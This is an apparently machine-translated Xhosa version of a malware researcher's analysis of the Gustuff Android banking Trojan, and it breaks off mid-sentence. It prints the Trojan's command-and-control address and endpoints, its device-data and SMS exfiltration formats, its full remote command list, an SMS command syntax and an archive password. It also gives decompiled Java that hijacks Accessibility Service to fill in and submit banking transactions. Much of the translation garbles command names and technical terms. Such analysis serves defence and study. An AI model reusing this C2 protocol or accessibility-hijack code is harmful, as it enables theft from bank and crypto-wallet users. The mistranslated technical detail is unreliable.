Ngenye imini Iqela-IB malunga nomsebenzi weselula ye-Android Trojan Gustuff. Isebenza ngokukodwa kwiimarike zamazwe ngamazwe, ukuhlasela abathengi be-100 yeebhanki ezinkulu zangaphandle, abasebenzisi be-mobile 32 crypto wallets, kunye nezixhobo ezinkulu ze-e-commerce. Kodwa umphuhlisi we-Gustuff ngu-cybercriminal othetha isiRashiya phantsi kwegama lesidlaliso elithi Bestoffer. Ukuza kuthi ga ngoku, udumise iTrojan yakhe "njengemveliso enzulu yabantu abanolwazi kunye namava."
Ingcaphephe yohlalutyo lwekhowudi ekhohlakeleyo kwiQela-IB UIvan Pisarev kuphando lwakhe, uthetha ngokweenkcukacha malunga nendlela uGustuff asebenza ngayo kunye neengozi zayo.
Uzingela bani uGustuff?
I-Gustuff yeyesizukulwana esitsha se-malware enemisebenzi ezenzekelayo ngokupheleleyo. Ngokomphuhlisi, iTrojan iye yaba yinguqulelo entsha kunye nephuculweyo ye-malware ye-AndyBot, eyathi ukususela ngoNovemba 2017 ihlasele iifowuni ze-Android kunye nokuba imali ngeefom zewebhu ze-phishing ezizenza njengezicelo zeselula ezaziwayo-kakuhle iibhanki zamazwe ngamazwe kunye neenkqubo zokuhlawula. I-Bestoffer ibike ukuba ixabiso lerenti ye-Gustuff Bot yayiyi-800 yeedola ngenyanga.
Uhlalutyo lwesampulu yeGustuff lubonise ukuba iTrojan inokujolisa abathengi abasebenzisa izicelo ezihambayo zeebhanki ezinkulu, ezifana neBhanki yaseMelika, iBhanki yaseSkotlani, iJPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, kunye ne-crypto wallets. I-Bitcoin Wallet, iBitPay, iCryptopay, iCoinbase, njl.
Idalwe ekuqaleni njengeTrojan yebhanki yakudala, kwinguqulelo yangoku iGustuff iye yalwandisa kakhulu uluhlu lweethagethi ezinokubakho zokuhlaselwa. Ukongeza kwizicelo ze-Android zeebhanki, iinkampani ze-fintech kunye neenkonzo ze-crypto, i-Gustuff ijolise kubasebenzisi bezicelo zemarike, iivenkile ze-intanethi, iinkqubo zokuhlawula kunye nabathunywa abakhawulezayo. Ngokukodwa, i-PayPal, i-Western Union, i-eBay, i-Walmart, i-Skype, i-WhatsApp, i-Gett Taxi, i-Revolut kunye nabanye.
Indawo yokungena: ubalo losulelo oluninzi
I-Gustuff ibonakaliswe "yi-classic" ye-vector yokungena kwii-smartphones ze-Android ngokuthumela i-SMS enekhonkco kwii-APK. Xa isixhobo se-Android sosulelwe yiTrojan ngokomyalelo womncedisi, i-Gustuff inokusasaza ngakumbi ngedathabheyisi yefowuni eyosulelekileyo okanye ngesiseko sedatha yeseva. Ukusebenza kweGustuff yenzelwe ukusuleleka ngobuninzi kunye neyona nto iphezulu kwishishini labaqhubi bayo - inomsebenzi owodwa "wokuzalisa ngokuzenzekelayo" kwizicelo ezisemthethweni zebhanki eziphathwayo kunye ne-crypto wallets, ekuvumela ukuba ukhawuleze kwaye ulinganise ubusela bemali.
Uphononongo lweTrojan lubonise ukuba umsebenzi wokuzalisa ngokuzenzekelayo waphunyezwa kuyo usebenzisa iNkonzo yokuFikelela, inkonzo yabantu abakhubazekileyo. I-Gustuff ayisiyiyo iTrojan yokuqala ukudlula ngempumelelo ukhuseleko ngokuchasene nokusebenzisana nezinto zefestile zezinye izicelo usebenzisa le nkonzo ye-Android. Nangona kunjalo, ukusetyenziswa kweNkonzo yokuFikelela ngokudibanisa nesigcwalisi semoto kusenqabile.
Emva kokukhuphela kwifowuni yexhoba, uGustuff, usebenzisa iNkonzo yokuFikelela, uyakwazi ukusebenzisana nezinto zefestile zezinye izicelo (ibhanki, i-cryptocurrency, kunye nezicelo zokuthenga kwi-intanethi, ukuthumela imiyalezo, njl.), ukwenza izenzo eziyimfuneko kubahlaseli. . Umzekelo, ngokomyalelo womncedisi, iTrojan inokucofa amaqhosha kwaye itshintshe amaxabiso eenkalo zombhalo kwizicelo zebhanki. Ukusebenzisa indlela yeNkonzo yokuFikelela ivumela iTrojan ukuba idlule iindlela zokhuseleko ezisetyenziswa ziibhanki ukuchasana nesizukulwana sangaphambili seTrojans ezihambayo, kunye notshintsho kumgaqo-nkqubo wokhuseleko ophunyezwe nguGoogle kwiinguqulelo ezintsha ze-Android OS. Ngaloo ndlela, uGustuff "uyayazi indlela" yokukhubaza ukukhuselwa kweGoogle Protect: ngokutsho kombhali, lo msebenzi usebenza kwi-70% yamatyala.
I-Gustuff ingabonisa izaziso zobuxoki ze-PUSH ezinee-icon zezicelo ezisemthethweni zeselfowuni. Umsebenzisi ucofa kwisaziso se-PUSH kwaye ubona iwindow ye-phishing ekhutshelwe kumncedisi, apho ingena khona ikhadi lebhanki eliceliwe okanye idatha ye-wallet ye-crypto. Kwenye imeko ye-Gustuff, isicelo egameni apho isaziso se-PUSH sibonisiwe sivuliwe. Kule meko, i-malware, phezu komyalelo ovela kumncedisi ngeNkonzo yokuFikelela, inokugcwalisa iifom zefom yesicelo sebhanki kwintengiselwano yobuqhophololo.
Ukusebenza kukaGustuff kukwabandakanya ukuthumela ulwazi malunga nesixhobo esosulelekileyo kwiseva, ukukwazi ukufunda / ukuthumela imiyalezo yeSMS, ukuthumela izicelo ze-USSD, ukwazisa i-SOCKS5 Proxy, ukulandela ikhonkco, ukuthumela iifayile (kubandakanya ukuskena kweefoto zamaxwebhu, iifoto zesikrini, iifoto) iseva , phinda usete ifowuni kuseto lwasefektri.
Uhlalutyo lweMalware
Ngaphambi kokufaka usetyenziso olubi, i-Android OS ibonisa umsebenzisi ifestile equlathe uluhlu lwamalungelo acelwe nguGustuff:
Isicelo siya kufakwa kuphela emva kokufumana imvume yomsebenzisi. Emva kokuqaliswa kwesicelo, iTrojan iya kubonisa umsebenzisi ifestile:
Emva koko iya kususa i icon yayo.
I-Gustuff ipakishwe, ngokutsho kombhali, ngumpakishi ovela kwi-FTT. Emva kokuqaliswa, isicelo siqhagamshelana ngamaxesha athile neseva ye-CnC ukufumana imiyalelo. Iifayile ezininzi esizivavanyileyo zisebenzisa idilesi ye-IP njengomncedisi wolawulo 88.99.171[.]105 (emva koku siza kuyichaza njenge <%CnC%>).
Emva kokuqaliswa, inkqubo iqala ukuthumela imiyalezo kwiseva http://<%CnC%>/api/v1/get.php.
Impendulo ilindeleke ukuba ibe yi-JSON ngolu hlobo lulandelayo:
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}Ngalo lonke ixesha isicelo sifunyenwe, sithumela ulwazi malunga nesixhobo esosulelekileyo. Ifomati yomyalezo iboniswe ngezantsi. Kubalulekile ukuba uqaphele ukuba amasimi ngokupheleleyo, extra, apps и imvume - ngokuzithandela kwaye iya kuthunyelwa kuphela xa kukho umyalelo wesicelo ovela kwi-CnC.
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
} Ukugcina idatha yoqwalaselo
I-Gustuff igcina ulwazi olubalulekileyo olusebenzayo kwifayile ekhethiweyo. Igama lefayile, kunye namagama eparameters kuyo, sisiphumo sokubala i-MD5 sum ukusuka kumtya. 15413090667214.6.1<%igama%>phi <%igama%> - ixabiso legama lokuqala. Ingcaciso yePython yomsebenzi wokuvelisa igama:
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
Kwelandelayo siza kuyichaza njenge igamaJenereyitha(igalelo).
Ke igama lefayile yokuqala ngu: umvelisi wegama("API_SERVER_LIST"), iqulathe amaxabiso anala magama alandelayo:
| Igama eliguquguqukayo | Nentsingiselo |
|---|---|
| umvelisi wegama("API_SERVER_LIST") | Iqulethe uluhlu lweedilesi ze-CnC ngendlela yoluhlu. |
| umvelisi wegama("API_SERVER_URL") | Iqulethe idilesi ye-CnC. |
| umvelisi wegama("SMS_UPLOAD") | Iflegi imiselwe ngokwendalo. Ukuba iflegi isetiwe, ithumela imiyalezo ye-SMS kwi-CnC. |
| umvelisi wegama("SMS_ROOT_NUMBER") | Inombolo yefowuni apho imiyalezo yeSMS efunyenwe sisixhobo esosulelekileyo iya kuthunyelwa. Ukuhlala kukho null. |
| umvelisi wegama("SMS_ROOT_NUMBER_RESEND") | Iflegi iyacinywa ngokungagqibekanga. Ukuba ifakiwe, xa isixhobo esisulelekileyo sifumana iSMS, siya kuthunyelwa kwinombolo yengcambu. |
| igama leGenerator("DEFAULT_APP_SMS") | Iflegi iyacinywa ngokungagqibekanga. Ukuba le flegi isetiwe, isicelo siyakuqhuba imiyalezo yeSMS engenayo. |
| umvelisi wegama("DEFAULT_ADMIN") | Iflegi iyacinywa ngokungagqibekanga. Ukuba iflegi isetiwe, isicelo sinamalungelo omlawuli. |
| nameGenerator("DEFAULT_ACCESSIBILITY") | Iflegi iyacinywa ngokungagqibekanga. Ukuba iflegi isetiwe, inkonzo esebenzisa iNkonzo yokuFikelela iyasebenza. |
| igama leGenerator("APPS_CONFIG") | Into ye-JSON equlathe uluhlu lwezenzo ekufuneka zenziwe xa isiganeko sokuFumaneka esihambelana nesicelo esithile siqhutywa. |
| i- namegenerator("APPS_INSTALLED") | Igcina uluhlu lwezicelo ezifakwe kwisixhobo. |
| umenzi wegama("IS_FIST_RUN") | Iflegi iphinda isetwe ekuqaleni. |
| umenzi wegama("UNIQUE_ID") | Iqulethe isichongi esisodwa. Yenziwe xa i-bot iqaliswa okokuqala. |
Imodyuli yokucwangcisa imiyalelo evela kumncedisi
Isicelo sigcina iidilesi zeeseva ze-CnC ngokohlobo loluhlu olufakwe ngekhowudi Isiseko85 imigca. Uluhlu lweeseva ze-CnC lunokutshintshwa xa kufunyenwe umyalelo ofanelekileyo, apho iidilesi ziya kugcinwa kwifayile ekhethiweyo.
Ekuphenduleni isicelo, umncedisi uthumela umyalelo kwisicelo. Kubalulekile ukuqaphela ukuba imiyalelo kunye neeparamitha zinikezelwe kwifomati ye-JSON. Isicelo sinokuqhuba le miyalelo ilandelayo:
| Iqela | inkcazelo |
|---|---|
| phambiliQalisa | Qala ukuthumela imiyalezo yeSMS efunyenwe sisixhobo esosulelekileyo kwiseva yeCnC. |
| Misa phambili | Yeka ukuthumela imiyalezo yeSMS efunyenwe sisixhobo esosulelekileyo kwiseva ye-CnC. |
| ussdRun | Yenza isicelo se-USSD. Inombolo omele wenze kuyo isicelo se-USSD ifumaneka kwindawo ye-JSON "inombolo". |
| thumela iSMS | Thumela umyalezo omnye weSMS (ukuba kukho imfuneko, umyalezo "uqhekeke" ube ngamacandelo). Njengeparamitha, umyalelo uthatha into ye-JSON equlethe iindawo "ukuya" - inombolo yendawo kunye "nomzimba" - umzimba womyalezo. |
| Thumela iSmsAb | Thumela imiyalezo yeSMS (ukuba kukho imfuneko, umyalezo “ukwahlulwe” ube ziinxalenye) kuye wonke umntu okuluhlu loqhagamshelwano lwesixhobo esosulelekileyo. Isithuba phakathi kokuthumela imiyalezo yimizuzwana eli-10. Umzimba womyalezo ukwibala le-JSON "umzimba" |
| thumela iSMSMisa | Thumela imiyalezo ye-SMS (ukuba kuyimfuneko, umyalezo "uqhekeke" kwiindawo) kubafowunelwa abachazwe kwiiparamitha zomyalelo. Isithuba phakathi kokuthumela imiyalezo yimizuzwana eli-10. Njengeparamitha, umyalelo uthatha uluhlu lwe-JSON (indawo ye-"sms"), izinto eziqulathe iindawo "ukuya" - inombolo yendawo kunye "nomzimba" - umzimba womyalezo. |
| tshintsha iServer | Lo myalelo unokuthatha ixabiso ngeqhosha elithi “url” njengeparamitha- ngoko ibhota iya kutshintsha ixabiso legamaJeneretha(“SERVER_URL”), okanye “uluhlu” - emva koko ibhot iyakubhala uluhlu kwigamaJeneretha (“API_SERVER_LIST”) Ngaloo ndlela, isicelo sitshintsha idilesi yeeseva ze-CnC. |
| adminNumber | Umyalelo uyilelwe ukusebenza ngengcambu yenombolo. Umyalelo wamkela into ye-JSON enezi parameters zilandelayo: "inani" - tshintsha igamaGenerator("ROOT_NUMBER") kwixabiso elifunyenweyo, "thumela kwakhona" - tshintsha igamaGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" - thumela kwi-nameGenerator("ROOT_NUMBER" ) uniqueID. |
| updateInfo | Thumela ulwazi malunga nesixhobo esosulelekileyo kwiseva. |
| Sula idatha | Umyalelo wenzelwe ukucima idatha yomsebenzisi. Kuxhomekeka ukuba leliphi igama isicelo esaphehlelelwayo, mhlawumbi idatha icinywe ngokupheleleyo ngokuphinda kuqaliswe isixhobo (umsebenzisi oyintloko), okanye kuphela idatha yomsebenzisi ecinyiweyo (umsebenzisi wesibini). |
| iikawusiQala | Qalisa imodyuli yoMmeli. Ukusebenza kwemodyuli kuchazwe kwicandelo elahlukileyo. |
| iikawusiStop | Misa imodyuli yoMmeli. |
| openLink | Landela ikhonkco. Ikhonkco ibekwe kwiparameter ye-JSON phantsi kweqhosha elithi "url". "android.intent.action.VIEW" isetyenziselwa ukuvula ikhonkco. |
| uploadAllSms | Thumela yonke imiyalezo yeSMS efunyenwe sisixhobo kwiseva. |
| uploadAllPhotos | Thumela imifanekiso esuka kwisixhobo esosulelekileyo kwi-URL. I-URL iza njengeparamitha. |
| uploadFile | Thumela ifayile kwi-URL kwisixhobo esosulelekileyo. I-URL iza njengeparamitha. |
| layishaIinombolo zeFowuni | Thumela iinombolo zefowuni kuluhlu lwakho lwabafowunelwa kwiseva. Ukuba ixabiso lento ye-JSON eneqhosha elithi "ab" lifunyenwe njengepharamitha, isicelo sifumana uluhlu lwabafowunelwa kwincwadi yefowuni. Ukuba into ye-JSON eneqhosha elithi "sms" ifunyenwe njengepharamitha, isicelo sifunda uluhlu lwabafowunelwa kubathumeli bemiyalezo yeSMS. |
| tshintsha i-Archive | Isicelo sikhuphela ifayile kwidilesi eza njenge parameter usebenzisa iqhosha elithi "url". Ifayile ekhutshelweyo igcinwa enegama elithi "archive.zip". Isicelo siya kuthi emva koko siyivule ifayile, sisebenzisa igama eliyimfihlo eliyimfihlo “b5jXh37gxgHBrZhQ4j3D”. Iifayile ezingafakwanga zigcinwe kwi [ugcino lwangaphandle]/hgps ulawulo. Kolu luhlu, isicelo sigcina i-web fakes (echazwe ngezantsi). |
| stock | Umyalelo wenzelwe ukusebenza ngeAction Service, echazwe kwicandelo elahlukileyo. |
| uvavanyo | Ungenzi nto. |
| Ukukhuphela | Umyalelo wenzelwe ukukhuphela ifayile kwiseva ekude kwaye uyigcine kwi-"Downloads" directory. I-URL kunye negama lefayile liza njengeparameter, amasimi kwi-parameter ye-JSON into, ngokulandelanayo: "url" kunye ne "fileName". |
| ukususa | Isusa ifayile kulawulo luka "Download". Igama lefayile liza kwiparameter ye-JSON kunye neqhosha elithi "fileName". Igama lefayile esemgangathweni ngu "tmp.apk". |
| saziso | Bonisa isaziso esinenkcazelo kunye neetekisi zesihloko ezichazwe ngumncedisi wolawulo. |
Ifomathi yomyalelo saziso:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}Isaziso esiveliswe yifayile phantsi kophando sijongeka ngokufanayo kwizaziso ezenziwe sisicelo esichazwe kwintsimi. app. Ukuba ixabiso endle openApp - Kuyinyaniso, xa isaziso sivulwa, isicelo esichazwe kwintsimi siqaliswa app. Ukuba ixabiso endle openApp - Bubuxoki, ngoko:
- Iwindow yokukhohlisa iyavula, imixholo ekhutshelwa kulawulo <% ugcino lwangaphandle%>/hgps/<%filename%>
- Iwindow yokukhohlisa iyavula, imixholo ekhutshelwa kumncedisi <%url%>?id=<%Bot id%>&app=<%Igama lesicelo%>
- Ifestile ye-phishing ivula, iguqulwe njengeKhadi le-Google Play, kunye nethuba lokufaka iinkcukacha zekhadi.
Isicelo sithumela isiphumo sawo nawuphi na umyalelo ku <%CnC%>set_state.php njengento ye-JSON ngolu hlobo lulandelayo:
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
IintshukumoService
Uluhlu lwemiyalelo olubandakanya iinkqubo zesicelo inyathelo. Xa umyalelo ufunyenwe, imodyuli yokulungiswa komyalelo ifikelela kule nkonzo ukwenza umyalelo owandisiweyo. Inkonzo yamkela into ye JSON njenge parameter. Inkonzo inokuphumeza le miyalelo ilandelayo:
1. PARMS_ACTION - xa ufumana umyalelo onjalo, inkonzo ifumana kuqala kwi-parameter ye-JSON ixabiso lesitshixo soHlobo, olunokuba ngolu hlobo lulandelayo:
- serviceInfo -umyalelo osezantsi ufumana ixabiso ngesitshixo kwiparameter yeJSON qukaAkubalukanga. Ukuba iflegi yiNyaniso, isicelo siseta iflegi FLAG_ISOLATED_PROCESS kwinkonzo esebenzisa iNkonzo yokuFikelela. Ngale ndlela inkonzo iya kuqaliswa ngenkqubo eyahlukileyo.
- Ingcambu — fumana kwaye uthumele kumncedisi ulwazi malunga nefestile ekugxilwe kuyo ngoku. Isicelo sifumana ulwazi kusetyenziswa iklasi yoFikeleloNodeInfo.
- admin — cela amalungelo omlawuli.
- ukulibaziseka — nqumamisa i-ActionsService ngenani le-millisecond elichazwe kwipharamitha yeqhosha elithi "data".
- windows — thumela uluhlu lweefestile ezibonakalayo kumsebenzisi.
- fakela — faka usetyenziso kwisixhobo esosulelekileyo. Igama lepakethe yendawo yokugcina likwiqhosha elithi "fileName". Uvimba ngokwawo ubekwe kulawulo lokukhuphela.
- jikelele Umyalelo ongaphantsi ujonge ukuzulazula kwifestile yangoku:
- kwi Useto oluKhawulezayo menu
- ngasemva
- ekhaya
- kwizaziso
- kwifestile yezicelo ezisanda kuvulwa
- Qalisa - sungula isicelo. Igama lesicelo liza njenge parameter ngeqhosha idata.
- izandi — tshintsha imowudi yesandi ukuba ithi cwaka.
- uvule — ulayita isibane sangasemva sesikrini kunye nebhodi yezitshixo ekukhanyeni okupheleleyo. Isicelo senza esi senzo sisebenzisa iWakeLock, ichaza umtya [Ilebhile yesicelo]:INFO njengethegi.
- imvumeUkwaleka — umsebenzi awuphunyezwanga (impendulo kuphumezo lomyalelo ithi {"umyalezo":"Awuxhaswa"} okanye {"umyalezo":"low sdk"})
- isenzo — umsebenzi awuphunyezwanga (impendulo kumyalelo wophumezo ngu {"umyalezo":"Awuxhaswa"}okanye {"umyalezo":"Low API"})
- aneemvume — lo myalelo uyimfuneko ukucela iimvume zesicelo. Nangona kunjalo, umsebenzi wombuzo awuphunyezwanga, ngoko ke umyalelo awunantsingiselo. Uluhlu lwamalungelo aceliweyo luza njengoluhlu lwe-JSON kunye neqhosha elithi "iimvume". Uluhlu olusemgangathweni:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- evulekileyo — bonisa ifestile yokukhohlisa. Kuxhomekeka kwiparamitha evela kumncedisi, usetyenziso lunokubonisa ezi festile zilandelayo:
- Bonisa iwindow yokukhohlisa imixholo yayo ebhalwe kwifayile kulawulo <% uvimba weefayili wangaphandle%>/hgps/<%param_igama lefayile%>. Isiphumo sokusebenzisana komsebenzisi kunye nefestile siya kuthunyelwa kuyo <%CnC%>/records.php
- Bonisa ifestile yokurhwaphiliza okuqulathwe kulayishwe kwangaphambili ukusuka kwidilesi <% url_param%>?id=<%bot_id%>&app=<%packagename%>. Isiphumo sokusebenzisana komsebenzisi kunye nefestile siya kuthunyelwa kuyo <%CnC%>/records.php
- Bonisa ifestile yokurhwaphiliza eguqulwe njengeKhadi lokuDla likaGoogle.
- Nziswano — Umyalelo uyilelwe ukusebenzisana nezinto zefestile zezinye iinkqubo usebenzisa iAcessibilityService. Inkonzo eyodwa iphunyeziwe kwinkqubo yonxibelelwano. Isicelo esiphantsi kophando sinokusebenzisana neefestile:
- Iyasebenza ngoku. Kule meko, iparameter iqulethe i-id okanye umbhalo (igama) wento ofuna ukusebenzisana nayo.
- Ibonakala kumsebenzisi ngexesha lomyalelo uphunyezwayo. Isicelo sikhetha iifestile nge-id.
Ukufumana izinto AccessibilityNodeInfo Kwifestile yezinto zomdla, isicelo, ngokuxhomekeke kwiparamitha, singenza ezi ntshukumo zilandelayo:
- gxininisa — seta ugqaliselo kwinto.
- cofa — cofa kwinto.
- actionId — yenza isenzo nge-ID.
- setText — tshintsha okubhaliweyo kwento. Ukutshintsha okubhaliweyo kunokwenzeka ngeendlela ezimbini: yenza isenzo ACTION_SET_TEXT (ukuba inguqulelo ye-Android yesixhobo esosulelekileyo incinci okanye ilingana nayo I-LOLLIPOP), okanye ngokubeka umtya kwibhodi eqhotyoshwayo kwaye uyincamathisele kwinto (yeenguqulelo ezindala). Lo myalelo ungasetyenziselwa ukutshintsha idatha kwisicelo sebhanki.
2. I-PARAMES_ACTIONS - Iyafana ne PARMS_ACTION, kuphela uluhlu lwemiyalelo ye-JSON olufikayo.
Kubonakala ngathi abantu abaninzi baya kuba nomdla ekubeni umsebenzi wokunxibelelana nezinto zefestile zesinye isicelo ujongeka njani. Le yindlela okwenziwa ngayo oku kusebenza eGustuff:
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}Umsebenzi wokutshintsha umbhalo:
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}Ngaloo ndlela, ngokucwangciswa ngokuchanekileyo komncedisi wokulawula, i-Gustuff iyakwazi ukuzalisa iindawo ezibhaliweyo kwisicelo sebhanki kwaye nqakraza kumaqhosha ayimfuneko ukugqiba ukuthengiselana. I-Trojan ayifuni nokungena kwisicelo-kwanele ukuthumela umyalelo wokubonisa isaziso se-PUSH kwaye emva koko uvule isicelo sebhanki esifakwe ngaphambili. Umsebenzisi uya kuziqinisekisa ngokwakhe, emva koko uGustuff uya kukwazi ukuzalisa imoto.
Imodyuli yokusetyenzwa komyalezo weSMS
Isicelo sihlohla isiphathi sesiganeko kwisixhobo esosulelekileyo samkele imiyalezo yeSMS. Isicelo esiphantsi kwesifundo sinokufumana imiyalelo evela kumqhubi, oza kumzimba womyalezo weSMS. Imiyalelo iza ngohlobo:
7!5=<%Base64 ikhowudi yomyalelo%>
Isicelo sikhangela umtya kuyo yonke imiyalezo yeSMS engenayo 7!5=, xa umtya ubhaqiwe, ikhupha ikhowudi kwi-Base64 kwi-offset 4 kwaye iphumeze umyalelo. Imiyalelo iyafana naleyo ine-CnC. Isiphumo sokwenziwa sithunyelwa kwinani elifanayo apho umyalelo uvela khona. Indlela yokuphendula:
7*5=<%Base64 encode of “result_code command”%>
Ngokuzithandela, isicelo sinokuthumela yonke imiyalezo efunyenweyo kwinombolo yeRoot. Ukwenza oku, inombolo yeRoot kufuneka icaciswe kwifayile ekhethiweyo kwaye iflegi yokuhanjiswa komyalezo kufuneka isetwe. Umyalezo weSMS uthunyelwa kwinombolo yomhlaseli ngefomathi:
<%Ukusuka kwinani%> - <%Ixesha, ifomathi: dd/MM/yyyy HH:mm:ss%> <%SMS body%>
Kwakhona, ngokuzikhethela, isicelo sinokuthumela imiyalezo kwi-CnC. Umyalezo weSMS uthunyelwa kwiseva ngefomathi ye-JSON:
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}Ukuba iflegi isetiwe igama leGenerator("DEFAULT_APP_SMS") -usetyenziso luyayeka ukusetyenzwa nomyalezo weSMS kwaye lucoca uluhlu lwemiyalezo engenayo.
Imodyuli yommeli
Isicelo esiphantsi kwesifundo siqulethe imodyuli ye-Backconnect Proxy (emva koku ebizwa ngokuba yimodyuli ye-Proxy), eneklasi eyahlukileyo ebandakanya imimandla engatshintshiyo kunye noqwalaselo. Idatha yoqwalaselo igcinwe kwisampulu kwifom ecacileyo:
Zonke iintshukumo ezenziwa nguMmeli wemodyuli zilogwe kwiifayile. Ukwenza oku, isicelo kuGcino lwaNgaphandle senza ulawulo olubizwa ngokuba yi "logs" (indawo yeProxyConfigClass.logsDir kwiklasi yoqwalaselo), apho iifayile zelogi zigcinwa khona. Ukungena kwiifayile ezinamagama:
- eyona.txt -umsebenzi weklasi obizwa ngokuba yiCommandServer ungene kule fayile. Kokulandelayo, ukuloga umtya kule fayile kuya kuchazwa njengoLog ongundoqo(str).
- iseshoni-<%id%>.txt — le fayile igcina idatha yelog edityaniswe neseshoni ethile yommeli. Kokulandelayo, ukuloga umtya kule fayile kuya kuchazwa njengeseshoniLog (str).
- iseva.txt - le fayile isetyenziselwa ukuloga yonke idatha ebhaliweyo kwiifayile ezichazwe ngasentla.
Ifomati yedatha yelog:
<%Umhla%> [Umsonto[<%% id%>], id[]]: umtya welogi
Ulwahlulo olwenzekayo ngexesha lokusebenza kwemodyuli yeProxy nayo ifakwe kwifayile. Ukwenza oku, isicelo sivelisa into ye-JSON kule fomati ilandelayo:
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}Emva koko iyiguqulela kumboniso womtya kwaye uyiloge.
Imodyuli yoMmeli iqaliswe emva kokufumana umyalelo ohambelanayo. Xa umyalelo ufunyenwe ukuqalisa imodyuli yoMmeli, isicelo siqalisa inkonzo ebizwa Inkonzo engundoqo, enoxanduva lokulawula ukusebenza kwemodyuli yeProxy - ukuqala nokuyimisa.
Amanqanaba okuqalisa inkonzo:
1. Iqala isibali-xesha esisebenza kanye ngomzuzu kwaye ijonga umsebenzi wemodyuli yoMmeli. Ukuba imodyuli ayisebenzi, iyayiqala.
Kwakhona xa umcimbi uqaliswa android.net.conn.CONNECTIVITY_CHANGE Imodyuli yoMmeli iyaziswa.
2. Isicelo sidala iwake-lock ngeparameter PARTIAL_WAKE_LOCK aze ambambe. Oku kuthintela i-CPU yesixhobo ekubeni ingene kwindlela yokulala.
3. Izisa iklasi yokwenziwa komyalelo wemodyuli yoMmeli, kuqala ngokuloga umgca mainLog("umncedisi wokuqala") и
Umncedisi :: qala() umamkeli[<%proxy_cnc%>], iPort yomyalelo[<%command_port%>], i-proxyPort[<%proxy_port%>]
apho i-proxy_cnc, i-command_port kunye ne-proxy_port – iiparamitha ezifunyenwe kulungiselelo lweseva ye-Proxy.
Udidi lokucwangcisa umyalelo lubizwa ngokuba UQhagamshelwano lomyalelo. Ngokukhawuleza emva kokuqalisa, yenza ezi ntshukumo zilandelayo:
